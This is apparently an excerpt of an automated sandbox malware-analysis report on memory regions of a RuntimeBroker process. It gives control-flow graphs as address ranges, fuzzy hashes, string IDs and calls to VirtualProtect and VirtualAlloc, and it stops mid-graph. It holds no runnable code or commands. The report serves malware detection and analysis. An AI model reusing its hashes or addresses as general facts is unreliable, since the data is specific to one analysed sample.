                                                                                                                                      control_flow_graph 0 7ffd9b8b9faf-7ffd9b8ba15c 15 7ffd9b8ba882-7ffd9b8ba88f 0->15 16 7ffd9b8ba895-7ffd9b8ba8d7 15->16 17 7ffd9b8ba161-7ffd9b8ba16f 15->17 26 7ffd9b8ba994-7ffd9b8ba99a 16->26 19 7ffd9b8ba176-7ffd9b8ba25c 17->19 20 7ffd9b8ba171 17->20 40 7ffd9b8ba25e-7ffd9b8ba287 19->40 41 7ffd9b8ba28d-7ffd9b8ba2e7 19->41 20->19 27 7ffd9b8ba8dc-7ffd9b8ba939 26->27 28 7ffd9b8ba9a0-7ffd9b8ba9e2 26->28 38 7ffd9b8ba966-7ffd9b8ba991 27->38 39 7ffd9b8ba93b-7ffd9b8ba93f 27->39 42 7ffd9b8bac04-7ffd9b8bac0a 28->42 38->26 39->38 43 7ffd9b8ba941-7ffd9b8ba963 39->43 40->41 59 7ffd9b8ba2f6-7ffd9b8ba34b 41->59 60 7ffd9b8ba2e9-7ffd9b8ba2f1 41->60 44 7ffd9b8ba9e7-7ffd9b8bab2f 42->44 45 7ffd9b8bac10-7ffd9b8bac69 42->45 43->38 94 7ffd9b8bab95-7ffd9b8bab99 44->94 95 7ffd9b8bab31-7ffd9b8bab93 44->95 54 7ffd9b8bacf8-7ffd9b8bad06 45->54 55 7ffd9b8bac6f-7ffd9b8bacbb 45->55 62 7ffd9b8bad0d-7ffd9b8bad4f 54->62 55->54 77 7ffd9b8ba35a-7ffd9b8ba3af 59->77 78 7ffd9b8ba34d-7ffd9b8ba355 59->78 63 7ffd9b8ba86d-7ffd9b8ba87f 60->63 74 7ffd9b8bb137-7ffd9b8bb13d 62->74 63->15 79 7ffd9b8bad54-7ffd9b8badd4 74->79 80 7ffd9b8bb143-7ffd9b8bb177 call 7ffd9b8bc00a 74->80 99 7ffd9b8ba3be-7ffd9b8ba413 77->99 100 7ffd9b8ba3b1-7ffd9b8ba3b9 77->100 78->63 97 7ffd9b8badd6-7ffd9b8bade2 79->97 98 7ffd9b8bae04-7ffd9b8bae13 79->98 103 7ffd9b8bb179-7ffd9b8bb187 80->103 104 7ffd9b8bab9b-7ffd9b8babcd 94->104 105 7ffd9b8babcf-7ffd9b8babe2 94->105 122 7ffd9b8babe3-7ffd9b8bac01 95->122 110 7ffd9b8bae2f-7ffd9b8bae39 97->110 111 7ffd9b8bade4-7ffd9b8badf9 97->111 101 7ffd9b8bae15 98->101 102 7ffd9b8bae1a-7ffd9b8bae29 98->102 133 7ffd9b8ba415-7ffd9b8ba41d 99->133 134 7ffd9b8ba422-7ffd9b8ba477 99->134 100->63 101->102 108 7ffd9b8bae2b-7ffd9b8bae2c 102->108 109 7ffd9b8bae3e-7ffd9b8bae59 102->109 113 7ffd9b8bb192-7ffd9b8bb21b 103->113 104->122 105->122 108->110 115 7ffd9b8bae5b-7ffd9b8bae75 109->115 116 7ffd9b8bae79-7ffd9b8bb0dd 109->116 114 7ffd9b8bb116-7ffd9b8bb128 110->114 111->98 137 7ffd9b8bb2b3-7ffd9b8bb2d5 113->137 138 7ffd9b8bb221-7ffd9b8bb2aa 113->138 120 7ffd9b8bb12a-7ffd9b8bb134 114->120 115->116 116->120 130 7ffd9b8bb0df-7ffd9b8bb10b 116->130 120->74 122->42 130->114 133->63 152 7ffd9b8ba486-7ffd9b8ba4db 134->152 153 7ffd9b8ba479-7ffd9b8ba481 134->153 143 7ffd9b8bb426-7ffd9b8bb4bc 137->143 144 7ffd9b8bb2db-7ffd9b8bb326 137->144 138->137 165 7ffd9b8bb2ac 138->165 169 7ffd9b8bb57f-7ffd9b8bb5c5 143->169 170 7ffd9b8bb4c2-7ffd9b8bb4ce 143->170 159 7ffd9b8bb40d-7ffd9b8bb41a 144->159 179 7ffd9b8ba4ea-7ffd9b8ba53f 152->179 180 7ffd9b8ba4dd-7ffd9b8ba4e5 152->180 153->63 161 7ffd9b8bb32b-7ffd9b8bb339 159->161 162 7ffd9b8bb420-7ffd9b8bb421 159->162 163 7ffd9b8bb33b 161->163 164 7ffd9b8bb340-7ffd9b8bb3a2 161->164 168 7ffd9b8bb734-7ffd9b8bb793 162->168 163->164 177 7ffd9b8bb3a9-7ffd9b8bb3fb 164->177 178 7ffd9b8bb3a4 164->178 165->137 190 7ffd9b8bba5b-7ffd9b8bba88 168->190 191 7ffd9b8bb5cc-7ffd9b8bb5d2 169->191 181 7ffd9b8bb51b-7ffd9b8bb57d call 7ffd9b8b9a58 170->181 182 7ffd9b8bb4d0-7ffd9b8bb515 170->182 205 7ffd9b8bb405-7ffd9b8bb40a 177->205 206 7ffd9b8bb3fd-7ffd9b8bb402 177->206 178->177 207 7ffd9b8ba54e-7ffd9b8ba5a3 179->207 208 7ffd9b8ba541-7ffd9b8ba549 179->208 180->63 181->191 182->181 201 7ffd9b8bb798-7ffd9b8bb7d4 190->201 202 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 190->202 195 7ffd9b8bb721-7ffd9b8bb72e 191->195 195->168 198 7ffd9b8bb5d7-7ffd9b8bb5e5 195->198 203 7ffd9b8bb5e7 198->203 204 7ffd9b8bb5ec-7ffd9b8bb646 198->204 214 7ffd9b8bb7d6-7ffd9b8bb7ed 201->214 215 7ffd9b8bb7f1-7ffd9b8bba58 201->215 226 7ffd9b8bbabb-7ffd9b8bbaef 202->226 227 7ffd9b8bbab4 202->227 203->204 221 7ffd9b8bb648-7ffd9b8bb670 204->221 222 7ffd9b8bb6b6-7ffd9b8bb6de 204->222 205->159 206->205 235 7ffd9b8ba5a5-7ffd9b8ba5ad 207->235 236 7ffd9b8ba5b2-7ffd9b8ba607 207->236 208->63 214->215 215->190 224 7ffd9b8bb677-7ffd9b8bb6b4 221->224 225 7ffd9b8bb672 221->225 228 7ffd9b8bb6e5-7ffd9b8bb70e 222->228 229 7ffd9b8bb6e0 222->229 241 7ffd9b8bb719-7ffd9b8bb71e 224->241 225->224 232 7ffd9b8bbb0f-7ffd9b8bbb35 226->232 233 7ffd9b8bbaf1-7ffd9b8bbafe 226->233 227->226 228->241 229->228 238 7ffd9b8bbb05-7ffd9b8bbb0d 233->238 239 7ffd9b8bbb00 233->239 235->63 246 7ffd9b8ba616-7ffd9b8ba66b 236->246 247 7ffd9b8ba609-7ffd9b8ba611 236->247 238->232 239->238 241->195 251 7ffd9b8ba67a-7ffd9b8ba6cf 246->251 252 7ffd9b8ba66d-7ffd9b8ba675 246->252 247->63 256 7ffd9b8ba6de-7ffd9b8ba733 251->256 257 7ffd9b8ba6d1-7ffd9b8ba6d9 251->257 252->63 261 7ffd9b8ba735-7ffd9b8ba73d 256->261 262 7ffd9b8ba742-7ffd9b8ba797 256->262 257->63 261->63 266 7ffd9b8ba7a6-7ffd9b8ba7fb 262->266 267 7ffd9b8ba799-7ffd9b8ba7a1 262->267 271 7ffd9b8ba807-7ffd9b8ba85c 266->271 272 7ffd9b8ba7fd-7ffd9b8ba805 266->272 267->63 276 7ffd9b8ba868-7ffd9b8ba86a 271->276 277 7ffd9b8ba85e-7ffd9b8ba866 271->277 272->63 276->63 277->63
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zK_H
                                                                                                                                      • API String ID: 0-1931165123
                                                                                                                                      • Opcode ID: 86bc06eccc98955d8e2b045ba14131f3bb7e64c79c8cbf275d1a7cc1af189f83
                                                                                                                                      • Instruction ID: 9772f83052acb9dc39bbf523f5974061c5c016d77a675a1d8923f79bbfd0d3fc
                                                                                                                                      • Opcode Fuzzy Hash: 86bc06eccc98955d8e2b045ba14131f3bb7e64c79c8cbf275d1a7cc1af189f83
                                                                                                                                      • Instruction Fuzzy Hash: F3C2B870E1952D8FDBA8DB58C8A5BA9B7B5FF58300F5041E9D00DE72A5DE346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8E312D Relevance: 1.8, Strings: 1, Instructions: 518COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 278 7ffd9b8e312d-7ffd9b8e314c 280 7ffd9b8e3196-7ffd9b8e323a 278->280 281 7ffd9b8e314e-7ffd9b8e3182 278->281 285 7ffd9b8e323c-7ffd9b8e3241 280->285 286 7ffd9b8e3244-7ffd9b8e324d 280->286 282 7ffd9b8e3189-7ffd9b8e3190 281->282 283 7ffd9b8e3184 281->283 282->280 283->282 285->286 287 7ffd9b8e36dd-7ffd9b8e36e3 286->287 288 7ffd9b8e36e9-7ffd9b8e3702 287->288 289 7ffd9b8e3252-7ffd9b8e327c 287->289 290 7ffd9b8e3283-7ffd9b8e329c 289->290 291 7ffd9b8e327e 289->291 292 7ffd9b8e32a3-7ffd9b8e32bd 290->292 293 7ffd9b8e329e 290->293 291->290 295 7ffd9b8e32c4-7ffd9b8e32dc 292->295 296 7ffd9b8e32bf 292->296 293->292 297 7ffd9b8e32e3-7ffd9b8e3304 295->297 298 7ffd9b8e32de 295->298 296->295 299 7ffd9b8e3306-7ffd9b8e330a 297->299 300 7ffd9b8e3372-7ffd9b8e338f 297->300 298->297 299->300 303 7ffd9b8e330c-7ffd9b8e3320 299->303 301 7ffd9b8e3396-7ffd9b8e33af 300->301 302 7ffd9b8e3391 300->302 304 7ffd9b8e33b6-7ffd9b8e33d0 301->304 305 7ffd9b8e33b1 301->305 302->301 306 7ffd9b8e3364-7ffd9b8e336a 303->306 309 7ffd9b8e33d7-7ffd9b8e33ef 304->309 310 7ffd9b8e33d2 304->310 305->304 307 7ffd9b8e336c-7ffd9b8e336d 306->307 308 7ffd9b8e3322-7ffd9b8e3326 306->308 311 7ffd9b8e3403-7ffd9b8e343a 307->311 312 7ffd9b8e3328-7ffd9b8e332e 308->312 313 7ffd9b8e3331-7ffd9b8e3347 308->313 314 7ffd9b8e33f6-7ffd9b8e3400 309->314 315 7ffd9b8e33f1 309->315 310->309 318 7ffd9b8e343c-7ffd9b8e3441 311->318 319 7ffd9b8e3444-7ffd9b8e3520 311->319 312->313 316 7ffd9b8e3349 313->316 317 7ffd9b8e334e-7ffd9b8e3361 313->317 314->311 315->314 316->317 317->306 318->319 320 7ffd9b8e352a-7ffd9b8e359f 319->320 321 7ffd9b8e3522-7ffd9b8e3527 319->321 322 7ffd9b8e35f8-7ffd9b8e35fc 320->322 323 7ffd9b8e35a1-7ffd9b8e35ba 320->323 321->320 326 7ffd9b8e3603-7ffd9b8e361c 322->326 327 7ffd9b8e35fe 322->327 324 7ffd9b8e35bc-7ffd9b8e35c0 323->324 325 7ffd9b8e362d-7ffd9b8e3644 323->325 324->325 331 7ffd9b8e35c2-7ffd9b8e35d1 324->331 329 7ffd9b8e364b-7ffd9b8e3665 325->329 330 7ffd9b8e3646 325->330 328 7ffd9b8e361f-7ffd9b8e3625 326->328 327->326 332 7ffd9b8e3627-7ffd9b8e3628 328->332 333 7ffd9b8e35d3-7ffd9b8e35d7 328->333 334 7ffd9b8e366c-7ffd9b8e3690 329->334 335 7ffd9b8e3667 329->335 330->329 331->328 336 7ffd9b8e36d5-7ffd9b8e36da 332->336 339 7ffd9b8e35d9-7ffd9b8e35e8 333->339 340 7ffd9b8e35eb-7ffd9b8e35f2 333->340 337 7ffd9b8e3697-7ffd9b8e36bb 334->337 338 7ffd9b8e3692 334->338 335->334 336->287 341 7ffd9b8e36c2-7ffd9b8e36d3 337->341 342 7ffd9b8e36bd 337->342 338->337 339->340 340->322 341->336 342->341
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: 23d4330de91fd3a45d36c3c867cd1de3934d92ee41fb84802cdbdc742cc96459
                                                                                                                                      • Instruction ID: 9e79e4f9e4525d6cd9e503f2c55db893ae88d9c81ad9e4f297619825068c2e3d
                                                                                                                                      • Opcode Fuzzy Hash: 23d4330de91fd3a45d36c3c867cd1de3934d92ee41fb84802cdbdc742cc96459
                                                                                                                                      • Instruction Fuzzy Hash: 84221470E0461D8FDB59DFA8C895AEDBBB2FF48300F148269D419EB259DB34A981CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8A0DA8 Relevance: .3, Instructions: 286COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d46e82dbdbf498dd38c827f49ac2de2d755d873ef31bb8d3cd29ab430da731be
                                                                                                                                      • Instruction ID: 1c7a61f25bbd86f6ac8933299580862a1a5097171d44ef5a98b16534294c3f61
                                                                                                                                      • Opcode Fuzzy Hash: d46e82dbdbf498dd38c827f49ac2de2d755d873ef31bb8d3cd29ab430da731be
                                                                                                                                      • Instruction Fuzzy Hash: C7A1B071A19A4D8FE7A8DBACC8647A97FE1FB69304F4001BAD04ED72D6DB782801C741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B03FE Relevance: 1.7, APIs: 1, Instructions: 190memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 343 7ffd9b8b03fe-7ffd9b8b040b 344 7ffd9b8b0416-7ffd9b8b0427 343->344 345 7ffd9b8b040d-7ffd9b8b0415 343->345 346 7ffd9b8b0429-7ffd9b8b0431 344->346 347 7ffd9b8b0432-7ffd9b8b054b VirtualProtect 344->347 345->344 346->347 352 7ffd9b8b054d 347->352 353 7ffd9b8b0553-7ffd9b8b05a3 347->353 352->353
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8AF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AF000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8af000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 6007fb995177caa73088203b4dd7bc26afb8690d80304a8bbdd7d545aad02fbc
                                                                                                                                      • Instruction ID: 59d8b0098983a335f076d07e55c0766ff7146b99c541e695054566fec34c6f0c
                                                                                                                                      • Opcode Fuzzy Hash: 6007fb995177caa73088203b4dd7bc26afb8690d80304a8bbdd7d545aad02fbc
                                                                                                                                      • Instruction Fuzzy Hash: 64517E70D0864D8FDF59DFA8C845AEDBBF0FB5A310F1042AAD448E3252DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B1E1D Relevance: 1.4, APIs: 1, Instructions: 185memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 356 7ffd9b8b1e1d-7ffd9b8b1f53 VirtualAlloc 360 7ffd9b8b1f55 356->360 361 7ffd9b8b1f5b-7ffd9b8b1fbf 356->361 360->361
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8AF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AF000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8af000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: ed98166128f5a24a881d22030e5b99212c35924a2e76416ce0ee64d93ebc9393
                                                                                                                                      • Instruction ID: 46b768f7857330fedc581e5da39988cb075859c776401e4c3b2231b41df0add4
                                                                                                                                      • Opcode Fuzzy Hash: ed98166128f5a24a881d22030e5b99212c35924a2e76416ce0ee64d93ebc9393
                                                                                                                                      • Instruction Fuzzy Hash: D1512A70908A5D8FDF94EF68C845BE9BBF1FB69310F1041AAD00DE3255DB70A9858F80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B4A02 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 364 7ffd9b8b4a02-7ffd9b8b4a35 366 7ffd9b8b4a3f-7ffd9b8b4a78 364->366 368 7ffd9b8b4a86-7ffd9b8b4a8d 366->368 369 7ffd9b8b4a7a-7ffd9b8b4a84 366->369 370 7ffd9b8b4a8f-7ffd9b8b4c74 368->370 371 7ffd9b8b4aad-7ffd9b8b4f8c 368->371 369->368 370->368 377 7ffd9b8b4c7a-7ffd9b8b4c84 370->377 371->368 378 7ffd9b8b4f92-7ffd9b8b4f9c 371->378 377->368 378->368
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: b0281616520bee2015c5904817ddefc345dd9b3ac6bd7f281e9b2878082d7018
                                                                                                                                      • Instruction ID: 463265bef545a88bf77cddef2ea64d584024d54c16f0ba8798bf0a29c017e042
                                                                                                                                      • Opcode Fuzzy Hash: b0281616520bee2015c5904817ddefc345dd9b3ac6bd7f281e9b2878082d7018
                                                                                                                                      • Instruction Fuzzy Hash: 1E31E570A0962D8FEBB4DB58C8A47A9B7B4FB59300F1041E9D04DD2292DB786BC48F45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B4AB9 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 379 7ffd9b8b4ab9-7ffd9b8b4ac2 381 7ffd9b8b4acd-7ffd9b8b4b0c 379->381 383 7ffd9b8b4a86-7ffd9b8b4a8d 381->383 384 7ffd9b8b4b12-7ffd9b8b4b1c 381->384 385 7ffd9b8b4a8f-7ffd9b8b4c74 383->385 386 7ffd9b8b4aad-7ffd9b8b4f8c 383->386 384->383 385->383 392 7ffd9b8b4c7a-7ffd9b8b4c84 385->392 386->383 393 7ffd9b8b4f92-7ffd9b8b4f9c 386->393 392->383 393->383
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B4000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b4000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: 429ebe299b94fe5fc71c228feadaf02649acd968b522e98d70030d69bbee4603
                                                                                                                                      • Instruction ID: 36acc9f0d5640625fb53bf26f467d94201ede013638172f1c73097f0ea23edb3
                                                                                                                                      • Opcode Fuzzy Hash: 429ebe299b94fe5fc71c228feadaf02649acd968b522e98d70030d69bbee4603
                                                                                                                                      • Instruction Fuzzy Hash: 4E011E30E4562E8EEBA4DF58C8987E8B7F0EB59341F1541FAD05CD2291DA741AC48F81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8B9F14 Relevance: .6, Instructions: 634COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 394 7ffd9b8b9f14-7ffd9b8b9f23 395 7ffd9b8b9f25 394->395 396 7ffd9b8b9f2a-7ffd9b8bb177 call 7ffd9b8bc00a 394->396 395->396 401 7ffd9b8bb179-7ffd9b8bb187 396->401 402 7ffd9b8bb192-7ffd9b8bb21b 401->402 406 7ffd9b8bb2b3-7ffd9b8bb2d5 402->406 407 7ffd9b8bb221-7ffd9b8bb2aa 402->407 410 7ffd9b8bb426-7ffd9b8bb4bc 406->410 411 7ffd9b8bb2db-7ffd9b8bb326 406->411 407->406 427 7ffd9b8bb2ac 407->427 430 7ffd9b8bb57f-7ffd9b8bb5c5 410->430 431 7ffd9b8bb4c2-7ffd9b8bb4ce 410->431 421 7ffd9b8bb40d-7ffd9b8bb41a 411->421 423 7ffd9b8bb32b-7ffd9b8bb339 421->423 424 7ffd9b8bb420-7ffd9b8bb421 421->424 425 7ffd9b8bb33b 423->425 426 7ffd9b8bb340-7ffd9b8bb3a2 423->426 429 7ffd9b8bb734-7ffd9b8bb793 424->429 425->426 437 7ffd9b8bb3a9-7ffd9b8bb3fb 426->437 438 7ffd9b8bb3a4 426->438 427->406 447 7ffd9b8bba5b-7ffd9b8bba88 429->447 448 7ffd9b8bb5cc-7ffd9b8bb5d2 430->448 439 7ffd9b8bb51b-7ffd9b8bb57d call 7ffd9b8b9a58 431->439 440 7ffd9b8bb4d0-7ffd9b8bb515 431->440 460 7ffd9b8bb405-7ffd9b8bb40a 437->460 461 7ffd9b8bb3fd-7ffd9b8bb402 437->461 438->437 439->448 440->439 456 7ffd9b8bb798-7ffd9b8bb7d4 447->456 457 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 447->457 451 7ffd9b8bb721-7ffd9b8bb72e 448->451 451->429 454 7ffd9b8bb5d7-7ffd9b8bb5e5 451->454 458 7ffd9b8bb5e7 454->458 459 7ffd9b8bb5ec-7ffd9b8bb646 454->459 466 7ffd9b8bb7d6-7ffd9b8bb7ed 456->466 467 7ffd9b8bb7f1-7ffd9b8bba58 456->467 477 7ffd9b8bbabb-7ffd9b8bbaef 457->477 478 7ffd9b8bbab4 457->478 458->459 472 7ffd9b8bb648-7ffd9b8bb670 459->472 473 7ffd9b8bb6b6-7ffd9b8bb6de 459->473 460->421 461->460 466->467 467->447 475 7ffd9b8bb677-7ffd9b8bb6b4 472->475 476 7ffd9b8bb672 472->476 479 7ffd9b8bb6e5-7ffd9b8bb70e 473->479 480 7ffd9b8bb6e0 473->480 489 7ffd9b8bb719-7ffd9b8bb71e 475->489 476->475 482 7ffd9b8bbb0f-7ffd9b8bbb35 477->482 483 7ffd9b8bbaf1-7ffd9b8bbafe 477->483 478->477 479->489 480->479 486 7ffd9b8bbb05-7ffd9b8bbb0d 483->486 487 7ffd9b8bbb00 483->487 486->482 487->486 489->451
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 69a8511577b9d4cd26e954e339f2634f26d7faa42db4327247089329e7969133
                                                                                                                                      • Instruction ID: e36460883cf96697efb63585423a2b0e3e978196f635f57c7cecc0b513c41d05
                                                                                                                                      • Opcode Fuzzy Hash: 69a8511577b9d4cd26e954e339f2634f26d7faa42db4327247089329e7969133
                                                                                                                                      • Instruction Fuzzy Hash: 0F42DE70A0991D8FDBA8DF58C894BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8E527D Relevance: .4, Instructions: 370COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9791ef2bd85afef40cfb23a8ed74bec42db7e4435be039b23964ea85e33b0181
                                                                                                                                      • Instruction ID: 10460cfee173e67142d38bf3114fcdfda86b82ce6848c97371e98b65b61e8cc2
                                                                                                                                      • Opcode Fuzzy Hash: 9791ef2bd85afef40cfb23a8ed74bec42db7e4435be039b23964ea85e33b0181
                                                                                                                                      • Instruction Fuzzy Hash: DAD14C71E1965D8FDB9CEB58D865BE8B7B2FF58300F4401B9D00DA72E6DA346981CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BAFA6 Relevance: .4, Instructions: 365COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 559 7ffd9b8bafa6-7ffd9b8bafcf 561 7ffd9b8bafe2 559->561 562 7ffd9b8bafd1 559->562 563 7ffd9b8bb02f-7ffd9b8bb05f 561->563 564 7ffd9b8bafe4-7ffd9b8baff7 561->564 562->561 567 7ffd9b8bb0b8-7ffd9b8bb0be 563->567 564->563 568 7ffd9b8bb0c0-7ffd9b8bb0cf 567->568 569 7ffd9b8bb061-7ffd9b8bb09c 567->569 570 7ffd9b8bb0ff-7ffd9b8bb10b 568->570 572 7ffd9b8bb09e 569->572 573 7ffd9b8bb0a3-7ffd9b8bb0b5 569->573 574 7ffd9b8bb116-7ffd9b8bb128 570->574 572->573 573->567 575 7ffd9b8bb12a-7ffd9b8bb13d 574->575 578 7ffd9b8bad54-7ffd9b8badd4 575->578 579 7ffd9b8bb143-7ffd9b8bb177 call 7ffd9b8bc00a 575->579 588 7ffd9b8badd6-7ffd9b8bade2 578->588 589 7ffd9b8bae04-7ffd9b8bae13 578->589 592 7ffd9b8bb179-7ffd9b8bb187 579->592 596 7ffd9b8bae2f-7ffd9b8bae39 588->596 597 7ffd9b8bade4-7ffd9b8badf9 588->597 590 7ffd9b8bae15 589->590 591 7ffd9b8bae1a-7ffd9b8bae29 589->591 590->591 594 7ffd9b8bae2b-7ffd9b8bae2c 591->594 595 7ffd9b8bae3e-7ffd9b8bae59 591->595 598 7ffd9b8bb192-7ffd9b8bb21b 592->598 594->596 599 7ffd9b8bae5b-7ffd9b8bae75 595->599 600 7ffd9b8bae79-7ffd9b8bb0dd 595->600 596->574 597->589 609 7ffd9b8bb2b3-7ffd9b8bb2d5 598->609 610 7ffd9b8bb221-7ffd9b8bb2aa 598->610 599->600 600->575 605 7ffd9b8bb0df-7ffd9b8bb0f4 600->605 605->570 613 7ffd9b8bb426-7ffd9b8bb4bc 609->613 614 7ffd9b8bb2db-7ffd9b8bb326 609->614 610->609 630 7ffd9b8bb2ac 610->630 633 7ffd9b8bb57f-7ffd9b8bb5c5 613->633 634 7ffd9b8bb4c2-7ffd9b8bb4ce 613->634 624 7ffd9b8bb40d-7ffd9b8bb41a 614->624 626 7ffd9b8bb32b-7ffd9b8bb339 624->626 627 7ffd9b8bb420-7ffd9b8bb421 624->627 628 7ffd9b8bb33b 626->628 629 7ffd9b8bb340-7ffd9b8bb3a2 626->629 632 7ffd9b8bb734-7ffd9b8bb793 627->632 628->629 640 7ffd9b8bb3a9-7ffd9b8bb3fb 629->640 641 7ffd9b8bb3a4 629->641 630->609 650 7ffd9b8bba5b-7ffd9b8bba88 632->650 651 7ffd9b8bb5cc-7ffd9b8bb5d2 633->651 642 7ffd9b8bb51b-7ffd9b8bb57d call 